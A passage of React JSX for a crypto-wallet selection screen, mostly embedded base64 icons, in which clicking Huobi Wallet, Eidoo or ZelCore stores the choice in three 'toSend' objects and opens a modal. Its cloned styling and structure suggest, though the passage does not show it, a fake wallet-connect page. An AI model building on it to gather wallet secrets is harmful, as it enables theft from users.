                                                    pm/kolm03XVW4wwwrgqf8mXXRXYY7aaZYrpvvOOOGPQqw0sptqllm0mknXUfZd+++qptz+MJVTbJbIqYaopqllKQwnaSisMMMullmVnQXUUWbYbTuONsjsOOOPQbL5Ijpqpuklm0VCCUbawwyyslmlXXRfUTYaaZI
                                                    7//AKJZcsphWG2C6ZYpQLJZpN10CQAW6e81JhpF1EW22AECmKqKYpN59VVe2WSOqYLpd5gAJF1Fm2GOya6rZJNNkHE2Gy6QAEKoZpJZlF0WWm6CqbJpZphUwAAFEmGmmaLbZ5Jd3Em2GCyK6QAAAJJZlF10G2WyqbI
                                                    pJltF1Ef/xAAqEQEAAAQFAgYCAwAAAAAAAAABABARICEwMUFRQNFQYXGBobGR8MHh8f/aAAgBAwEBPxCwyDr6ZhmkqdGX06D1Ne95Nyi39hzHAzr6/wByM0yDGPKEgOVhKYOWZBOiNjH8ToD3/N5NzOZPpOkHymXuX
                                                    gDg+WxFDy6SuHAa9oNBQLKOabQC6TM+gNjVgEVAs5OfqVcBrh3jmN8ZhYzBqwLPv62On7Qz1mBOswQHaHekwr6xeZFcX+mx0mBHGG0qLk07zoE3wmZlc5NnERrJz27+kAChOs3hO2evk+5k5tCJWrLG+v02sXwfZYZdb
                                                    iv3Om8mSiN2AANrKTybSwmSIpVdHCdQvDIV9e3A2mDv0A1DB+1lQHXtKoWyWHS1NO95YXBXxI4xwlVaaOJIArqYMiKMeHeHz1XoSEVVRg6hXz3hzTAxJEvehzWobv8AEjwYtPAjMOk//8QAKREBAAADBgYDAQEBAAAAA
                                                    AAAAQAQESAhMUFRcTBhgaGxwZHR4fDxQP/aAAgBAgEBPxCHgsMhTCMBUGwVjRkC1VeG2XguVVIBcK84Pq62mGwww8SoCjGUr54zNhhmwwywV2bDw2K3iAv0X1AiVJtlilz8rTDNhhntGh8BComjt+eKQ2GwKqkFrM5tl
                                                    sqBVjnoX5YU/Jv2z7QIlTC2yoNcHGyw2WQJG+46/lZ12xCnxd44LFKriXSeEdfy93N9f7PlH5BDDDNhhlf7Ow2WR1z0H25fOlhzLPgftlssQytsMsYiwNOby8wtSq4swrC8zHd+sOkIFWlYeI2a43vB72PyEb
                                                    qsWwlC0+b+Y/EMKM3l7fA9xeh7DXfX5tsMmGww3WgFWMGDANDL952BGDm6H9hBg0ELVQFWMadf4dCGQvUYHYr+dLDwGbMr32Me9LAQKrcEBxer1q/Rl+yv7uL92R0xee025qGzj38ww2GGTDYYYsod6v1Yuvv
                                                    btmb1w23kO2jf8xhklViknLQT36sttmE2/Amhebtn2gCdAuJNXMjrn9dLAXq+UMNhm2WFyyh1H9Jg7md0PFZE3gF+CEOM3s6Q2Wdxu8V4DYYZLTMl7PiZan4JJlGnm6KWGomb0y++smy8BhaBo8nM+uW0iXwr
                                                    R2bnzWTD4qpvS7vYpN1OfL75dIoBQsMPAZjBVf3zFeN6w9HR85Svcyn09TvWSUxnHs6eKRSHTfNdvvDxAUaCbwGyyTHUcmG2uaN50cTvADTlEpyejy1hhBi5Oj/YwSaoNxibuvL+pSkMMM3gNl4bNhsM2GGbwn
                                                    /iYZsMNhtsNlstln//xAApEAEAAgECBQUBAAMBAQAAAAABABARICExQVFhgTBxkaGxwUDR8OHx/9oACAEBAAE/EDSaiFmghZCEJ9iwnXvqxFfDAZvqHs4fufLK7Pn/ACCyFlFFFEKNBC+Jh4TfQ+4fUDd8B/SZZ
                                                    8oH1/ikKIWQ0ELLIWQhRedcr23/AEzPqdkx8IFAROImE9Uo0llkIUQshRCyEIUWTFjeQ7DzMzs/Q2e5/r1jQQhCiyijQWQshCiyEIel2LZ9ybVGeBuex9MshRoLIWQs0ELKKLLWFfiMyfVXX39u/olFlEIWWQhR
                                                    pKNBCzQXyw8JibDxPl3P9eiayFkKIUUUQ0GghCiyFkMdRBz7npFFFGgshCjQo01RUQEnDOeO8w2/Dud+48k40QhRDQWQsmfuVyf2O3oFlFEKNBDQXsFsTy/+sWKwvtj1Ojy6PmOfmTgDhE60aCFlkNCARBHZHnH
                                                    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"
              alt="Huobi Wallet"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Huobi Wallet");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Huobi Wallet",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Huobi Wallet",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Huobi Wallet",
                });
                handleShow();
              }}
            />
          </div>

          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            Huobi Wallet
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src="data:image/png;base64,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"
              alt="Eidoo"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Eidoo");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Eidoo",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Eidoo",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Eidoo",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">Eidoo</div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={zelcore}
              alt="ZelCore"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("ZelCore");
                setToSend({
                  ...toSend,
                  [e.target.name]: "ZelCore",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "ZelCore",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "ZelCore",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            ZelCore
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 kSIOSl">
            <img
              src="data:image/jpeg;base64,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
